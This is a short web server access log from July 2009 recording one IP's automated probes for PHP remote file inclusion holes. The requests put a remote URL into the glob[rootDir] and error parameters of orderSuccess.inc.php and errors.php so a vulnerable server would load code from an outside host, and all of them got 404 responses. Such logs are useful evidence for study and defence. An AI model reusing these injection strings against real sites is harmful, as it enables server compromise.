91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/3.0 (OS/2; U)"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /logs/error_log.Q109061400//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/3.0 (OS/2; U)"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/3.0 (OS/2; U)"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /logs/error_log.Q109061400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
91.202.4.158 - - [13/Jul/2009:00:26:59 -0400] "GET /logs/access_log.Q109061400/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
